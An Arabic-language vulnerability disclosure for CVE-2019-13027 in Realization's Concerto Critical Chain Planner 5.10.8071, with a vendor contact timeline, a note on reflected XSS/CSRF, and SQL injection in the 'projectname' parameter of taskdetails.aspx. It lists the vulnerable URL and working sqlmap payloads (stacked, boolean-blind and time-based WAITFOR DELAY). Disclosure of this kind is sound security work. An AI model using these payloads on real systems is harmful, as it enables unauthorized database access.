
تفاصيل الإفصاح عن CVE-2019-13027
تفاصيل الكشف عن CVE-2019-13027
الجدول الزمني للتواصل مع البائع: 1 يوليو 2019 -> لا رد، لا بريد إلكتروني.
4 يوليو 2019 -> لا رد، لا بريد إلكتروني.
8 يوليو 2019 -> تم إرسال البريد الإلكتروني، وتم إنشاء مستودع Github.
11 يوليو 2019 -> لا استجابة من البائع. تم الكشف عن الثغرة.
[نوع الثغرة] حقن SQL [قاعدة كود المنتج المتأثر] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - الإصدار: 5.10.8071 (الإصدارات الأخرى على فرع 5.x من المحتمل أن تكون متأثرة. لا يمكن الاختبار مع >فروع أخرى)
[المكوّن المتأثر] Realization Concerto Critical Chain Planner (المعروف أيضًا باسم CCPM) 5.10.8071 يحتوي على بعض القضايا الأمنية الحرجة، بما في ذلك حقن SQL في صفحة الويب taskupdt/taskdetails.aspx على الأقل عبر المعامل "projectname"
[نوع الهجوم] عن بُعد
[متجهات الهجوم] يحتوي التطبيق على الكثير من XSS/CSRF المنعكسة (على سبيل المثال، في checklist/checklist)، لكن الجزء الصعب هو حقن SQL. يلزم بعض التلاعب اعتمادًا على إصدار SQL Server و/أو IDS/IPS.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
يجب أن يكون ProjectName (foo) موجودًا وصالحًا. قم بتجريب باقي المعاملات (أو استخدم طلبًا حقيقيًا). يحتوي foo أيضًا على XSS
SQL المكتشف (حمولات من SQLMAP) المعامل: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[بائع المنتج] REALIZATION - https://www.realization.com/